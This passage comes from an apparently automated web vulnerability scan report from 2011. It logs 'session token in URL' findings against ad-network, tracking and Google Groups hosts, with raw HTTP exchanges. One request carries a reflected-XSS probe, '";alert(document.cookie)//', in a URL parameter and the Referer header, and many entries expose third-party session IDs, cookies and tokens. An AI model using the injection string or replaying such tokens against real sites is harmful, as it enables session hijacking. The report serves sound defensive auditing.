The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.tuenti.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 2005 04:59:59 GMT
Content-Type: text/html
Set-Cookie: ourl=deleted; expires=Mon, 25-Jan-2010 04:39:28 GMT; path=/; domain=.tuenti.com
Set-Cookie: manual_logout=deleted; expires=Mon, 25-Jan-2010 04:39:28 GMT; path=/; domain=.tuenti.com
X-Tuenti-State: logout
Connection: close
Date: Tue, 25 Jan 2011 04:39:29 GMT
Content-Length: 1611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><meta http-equiv="
...[SNIP]...

9. Session token in URL
There are 88 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


9.1. http://autotrader.tt.omtrdc.net/m2/autotrader/mbox/standard

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://autotrader.tt.omtrdc.net
Path:   /m2/autotrader/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:
  • http://autotrader.tt.omtrdc.net/m2/autotrader/mbox/standard?mboxHost=www.autotrader.com&mboxSession=1295921983404-727382&mboxPage=1295921983404-727382&screenHeight=1200&screenWidth=1920&browserWidth=1155&browserHeight=1012&browserTimeOffset=-360&colorDepth=16&mboxCount=1&page=%2Findex.jsp&mbox=global_css&mboxId=0&mboxTime=1295900383412&mboxURL=http%3A%2F%2Fwww.autotrader.com%2F%3Fbc4cb%2522%253balert(document.cookie)%2F%2F1ee177b82c%3D1&mboxReferrer=http%3A%2F%2Fburp%2Fshow%2F55&mboxVersion=39

Request

GET /m2/autotrader/mbox/standard?mboxHost=www.autotrader.com&mboxSession=1295921983404-727382&mboxPage=1295921983404-727382&screenHeight=1200&screenWidth=1920&browserWidth=1155&browserHeight=1012&browserTimeOffset=-360&colorDepth=16&mboxCount=1&page=%2Findex.jsp&mbox=global_css&mboxId=0&mboxTime=1295900383412&mboxURL=http%3A%2F%2Fwww.autotrader.com%2F%3Fbc4cb%2522%253balert(document.cookie)%2F%2F1ee177b82c%3D1&mboxReferrer=http%3A%2F%2Fburp%2Fshow%2F55&mboxVersion=39 HTTP/1.1
Host: autotrader.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 1312
Date: Tue, 25 Jan 2011 02:19:41 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('global_css',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-default-globa
...[SNIP]...

9.2. http://bh.contextweb.com/bh/set.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The URL in the request appears to contain a session token within the query string:
  • http://bh.contextweb.com/bh/set.aspx?action=add&advid=2709&token=TOT09

Request

GET /bh/set.aspx?action=add&advid=2709&token=TOT09 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://7newsboston.disqus.com/stats.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=gFEcJzqCjXJj

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web83
Set-Cookie: V=gFEcJzqCjXJj; Domain=.contextweb.com; Expires=Thu, 19-Jan-2012 21:55:49 GMT; Path=/
Set-Cookie: cwbh1=2709%3B02%2F23%2F2011%3BTOT09; Domain=.contextweb.com; Expires=Tue, 29-Dec-2015 21:55:49 GMT; Path=/
Content-Type: image/gif
Date: Mon, 24 Jan 2011 21:55:48 GMT
Content-Length: 49

GIF89a...................!.......,...........T..;

9.3. http://feedburner.google.com/fb/a/mailverify

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://feedburner.google.com
Path:   /fb/a/mailverify

Issue detail

The response contains the following links that appear to contain session tokens:
  • http://feedburner.google.com/fb/a/home?gsessionid=WUwm58oBrG3PsoODTDjQ7A
  • http://feedburner.google.com/fb/a/tos?gsessionid=WUwm58oBrG3PsoODTDjQ7A

Request

GET /fb/a/mailverify HTTP/1.1
Host: feedburner.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 24 Jan 2011 15:11:47 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Set-Cookie: S=feedburner-control-panel=WUwm58oBrG3PsoODTDjQ7A; Domain=.google.com; Path=/; HttpOnly
Server: GSE
Expires: Mon, 24 Jan 2011 15:11:47 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>

<head>
<meta name="r
...[SNIP]...
<h1><a href="/fb/a/home?gsessionid=WUwm58oBrG3PsoODTDjQ7A">FeedBurner</a>
...[SNIP]...
<div id="footer">
&copy;2004&ndash;2011
Google
(<a href="http://feedburner.google.com/fb/a/tos?gsessionid=WUwm58oBrG3PsoODTDjQ7A">Terms of Service</a>
...[SNIP]...

9.4. http://groups.google.com/group/joomla-commits/topics

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://groups.google.com
Path:   /group/joomla-commits/topics

Issue detail

The response contains the following links that appear to contain session tokens:
  • http://groups.google.com/group/joomla-commits/watch_topic?WebToken=a4cb402f6de1be23baf0a90a054989d9&nonmember=1&tid=09fa9134a3246f13&oldstate=0
  • http://groups.google.com/group/joomla-commits/watch_topic?WebToken=a4cb402f6de1be23baf0a90a054989d9&nonmember=1&tid=382296799f67c09f&oldstate=0
  • http://groups.google.com/group/joomla-commits/watch_topic?WebToken=a4cb402f6de1be23baf0a90a054989d9&nonmember=1&tid=502b8c7a41665d4c&oldstate=0
  • http://groups.google.com/group/joomla-commits/watch_topic?WebToken=a4cb402f6de1be23baf0a90a054989d9&nonmember=1&tid=5a4980db4f055f21&oldstate=0
  • http://groups.google.com/group/joomla-commits/watch_topic?WebToken=a4cb402f6de1be23baf0a90a054989d9&nonmember=1&tid=77e4c87b752bb5c5&oldstate=0
  • http://groups.google.com/group/joomla-commits/watch_topic?WebToken=a4cb402f6de1be23baf0a90a054989d9&nonmember=1&tid=9353275f1009dd78&oldstate=0
  • http://groups.google.com/group/joomla-commits/watch_topic?WebToken=a4cb402f6de1be23baf0a90a054989d9&nonmember=1&tid=9abbcb1686b81484&oldstate=0
  • http://groups.google.com/group/joomla-commits/watch_topic?WebToken=a4cb402f6de1be23baf0a90a054989d9&nonmember=1&tid=9c677c9cf1392509&oldstate=0
  • http://groups.google.com/group/joomla-commits/watch_topic?WebToken=a4cb402f6de1be23baf0a90a054989d9&nonmember=1&tid=d2b2d7b77ca52577&oldstate=0
  • http://groups.google.com/group/joomla-commits/watch_topic?WebToken=a4cb402f6de1be23baf0a90a054989d9&nonmember=1&tid=e478bafa4fa631e6&oldstate=0

Request

GET /group/joomla-commits/topics HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=1f5b6d5c3757484d:TM=1295908558:LM=1295908558:S=Imk6vvNPJNnIIJTB; expires=Wed, 23-Jan-2013 22:35:58 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 22:35:58 GMT
Server: GWS-GRFE/0.50
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<td class="blurb_star" valign=top width=18><a class=st
id="watchjoomla-commits@9c677c9cf1392509"
name="watchjoomla-commits@9c677c9cf1392509"
value="0"
target=_parent
href="/group/joomla-commits/watch_topic?WebToken=a4cb402f6de1be23baf0a90a054989d9&nonmember=1&tid=9c677c9cf1392509&oldstate=0"
>
<img border=0
class=stimg
align=absmiddle
width=15
height=15
title="Click the star to watch this topic"
id="watchjoomla-commits@9c677c9cf1392509_img"
name="wat
...[SNIP]...
<td class="blurb_star" valign=top width=18><a class=st
id="watchjoomla-commits@e478bafa4fa631e6"
name="watchjoomla-commits@e478bafa4fa631e6"
value="0"
target=_parent
href="/group/joomla-commits/watch_topic?WebToken=a4cb402f6de1be23baf0a90a054989d9&nonmember=1&tid=e478bafa4fa631e6&oldstate=0"
>
<img border=0
class=stimg
align=absmiddle
width=15
height=15
title="Click the star to watch this topic"
id="watchjoomla-commits@e478bafa4fa631e6_img"
name="wat
...[SNIP]...
<td class="blurb_star" valign=top width=18><a class=st
id="watchjoomla-commits@09fa9134a3246f13"
name="watchjoomla-commits@09fa9134a3246f13"
value="0"
target=_parent
href="/group/joomla-commits/watch_topic?WebToken=a4cb402f6de1be23baf0a90a054989d9&nonmember=1&tid=09fa9134a3246f13&oldstate=0"
>
<img border=0
class=stimg
align=absmiddle
width=15
height=15
title="Click the star to watch this topic"
id="watchjoomla-commits@09fa9134a3246f13_img"
name="wat
...[SNIP]...
<td class="blurb_star" valign=top width=18><a class=st
id="watchjoomla-commits@9353275f1009dd78"
name="watchjoomla-commits@9353275f1009dd78"
value="0"
target=_parent
href="/group/joomla-commits/watch_topic?WebToken=a4cb402f6de1be23baf0a90a054989d9&nonmember=1&tid=9353275f1009dd78&oldstate=0"
>
<img border=0
class=stimg
align=absmiddle
width=15
height=15
title="Click the star to watch this topic"
id="watchjoomla-commits@9353275f1009dd78_img"
name="wat
...[SNIP]...
<td class="blurb_star" valign=top width=18><a class=st
id="watchjoomla-commits@502b8c7a41665d4c"
name="watchjoomla-commits@502b8c7a41665d4c"
value="0"
target=_parent
href="/group/joomla-commits/watch_topic?WebToken=a4cb402f6de1be23baf0a90a054989d9&nonmember=1&tid=502b8c7a41665d4c&oldstate=0"
>
<img border=0
class=stimg
align=absmiddle
width=15
height=15
title="Click the star to watch this topic"
id="watchjoomla-commits@502b8c7a41665d4c_img"
name="wat
...[SNIP]...
<td class="blurb_star" valign=top width=18><a class=st
id="watchjoomla-commits@77e4c87b752bb5c5"
name="watchjoomla-commits@77e4c87b752bb5c5"
value="0"
target=_parent
href="/group/joomla-commits/watch_topic?WebToken=a4cb402f6de1be23baf0a90a054989d9&nonmember=1&tid=77e4c87b752bb5c5&oldstate=0"
>
<img border=0
class=stimg
align=absmiddle
width=15
height=15
title="Click the star to watch this topic"
id="watchjoomla-commits@77e4c87b752bb5c5_img"
name="wat
...[SNIP]...
<td class="blurb_star" valign=top width=18><a class=st
id="watchjoomla-commits@d2b2d7b77ca52577"
name="watchjoomla-commits@d2b2d7b77ca52577"
value="0"
target=_parent
href="/group/joomla-commits/watch_topic?WebToken=a4cb402f6de1be23baf0a90a054989d9&nonmember=1&tid=d2b2d7b77ca52577&oldstate=0"
>
<img border=0
class=stimg
align=absmiddle
width=15
height=15
title="Click the star to watch this topic"
id="watchjoomla-commits@d2b2d7b77ca52577_img"
name="wat
...[SNIP]...
<td class="blurb_star" valign=top width=18><a class=st
id="watchjoomla-commits@382296799f67c09f"
name="watchjoomla-commits@382296799f67c09f"
value="0"
target=_parent
href="/group/joomla-commits/watch_topic?WebToken=a4cb402f6de1be23baf0a90a054989d9&nonmember=1&tid=382296799f67c09f&oldstate=0"
>
<img border=0
class=stimg
align=absmiddle
width=15
height=15
title="Click the star to watch this topic"
id="watchjoomla-commits@382296799f67c09f_img"
name="wat
...[SNIP]...
<td class="blurb_star" valign=top width=18><a class=st
id="watchjoomla-commits@9abbcb1686b81484"
name="watchjoomla-commits@9abbcb1686b81484"
value="0"
target=_parent
href="/group/joomla-commits/watch_topic?WebToken=a4cb402f6de1be23baf0a90a054989d9&nonmember=1&tid=9abbcb1686b81484&oldstate=0"
>
<img border=0
class=stimg
align=absmiddle
width=15
height=15
title="Click the star to watch this topic"
id="watchjoomla-commits@9abbcb1686b81484_img"
name="wat
...[SNIP]...
<td class="blurb_star" valign=top width=18><a class=st
id="watchjoomla-commits@5a4980db4f055f21"
name="watchjoomla-commits@5a4980db4f055f21"
value="0"
target=_parent
href="/group/joomla-commits/watch_topic?WebToken=a4cb402f6de1be23baf0a90a054989d9&nonmember=1&tid=5a4980db4f055f21&oldstate=0"
>
<img border=0
class=stimg
align=absmiddle
width=15
height=15
title="Click the star to watch this topic"
id="watchjoomla-commits@5a4980db4f055f21_img"
name="wat
...[SNIP]...

9.5. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1020942407/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1020942407/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1020942407/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:49:27 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.6. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/106070212/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/106070212/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/106070212/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:48:16 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.7. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1088639060/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1088639060/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1088639060/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:54:59 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.8. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/112793374/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/112793374/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/112793374/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:39:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.9. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1153711873/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1153711873/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1153711873/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:58:35 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.10. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1187342870/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1187342870/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1187342870/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:09:19 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.11. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1202068108/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1202068108/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1202068108/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:50:53 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

9.12. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/121005439/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/121005439/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The response contains the following links that appear to contain session tokens:
